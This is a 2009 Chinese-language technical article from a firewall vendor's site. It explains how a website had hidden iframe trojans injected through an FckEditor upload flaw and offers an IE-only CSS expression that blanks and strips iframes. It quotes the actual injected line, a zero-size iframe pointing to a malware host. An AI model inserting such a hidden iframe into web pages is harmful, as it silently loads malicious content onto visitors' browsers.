English
 电子信箱
 加入收藏

  威盾防火墙 >> 支持与下载 >> 技术文章 >> 网站被挂iframe木马的解决方案

 

网站被挂iframe木马的解决方案

威盾防火墙 2009-06-16

 

今天一上服务器2000多个<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe> 被注入,我晕!检查了半天,原来是FckEditor编辑器上传漏洞导致。在找资料的同时,发现CSS有一个有趣的属性expression,发现这个东东还有点意思,由此写出来,“以儆效尤”!
  引用:“IE5 及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接引用元素自身的属性和方法,也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。”我的理解是:expression后面接 js表达式执行相关操作
  格式:
(1)标记固有的CSS属性名:expression(JS表达式);
(2)自定义属性名:expression(JS表达式);
使用JS销毁iframe对象原理:使iframe里的请求地址变成空白页(about:blank),再将iframe对象从DOM(文档对象模型)中移除就可以切断所有iframe里的请求了。
CSS代码:iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');}
解释:outerHTML属性是DOM对象包含自身的HTML代码,而 innerHTML则是DOM对象(不含本身)里面所包含的HTML代码。
例子如下: 如果要使自己的iframe显示在网页里,而别人挂的IFRAME马都不起作用,在CSS里加一个
#okiWuWei{iWuWei:expression() !important}
对应的IFRAME代码为:
<iframe id="okiWuWei"  src="http://blog.csdn.net/codeshark/"></iframe>就OK了。
问题总结:很多垃圾站点都通过“弹窗”的方式来增加自己的点击率跟访问量,估计也是通过iframe注入木马,然后达到这种效果的。当然次方法只是IE ONLY.也不能从根本上防止木马的注入。

首先,新建一个网页,插入以上的CSS代码(或在您现有的CSS代码里加入上面那句):
<style type="text/css">
iframe{WuWei:expression(this.src='about:blank',this.outerHTML='');}
</style>
然后在这个页面插入几个IFRAME代码,假设它们是被挂的木马网页。代码如下:
<iframe src=""></iframe>


相关内容: 最新内容:
防范三绝技-谈木马“查、堵、杀”[2009-06-15]
木马预警:暑期临近挂马网站有所下降[2009-06-15]
近期多个高校Web网站被植入恶意木马[2009-06-15]
6.15毒报:杀人魔和卡拉蜜木马病毒[2009-06-15]
无进程DLL木马开发思路与实现[2009-06-12]
木马免杀技术大盘点[2009-06-12]
其实我也很强大——IIS另类后门[2009-06-16]
利用系统自带命令搞定新病毒[2009-06-16]
北大等高校网站被挂马 高考生浏览需小心[2009-06-16]
美国公司称绿坝抄袭其代码 欲阻止PC厂商预装[2009-06-16]
中国医科大学等网站挂马 蠕虫通过U盘传播[2009-06-16]
认识史上最牛的三大漏洞病毒[2009-06-15]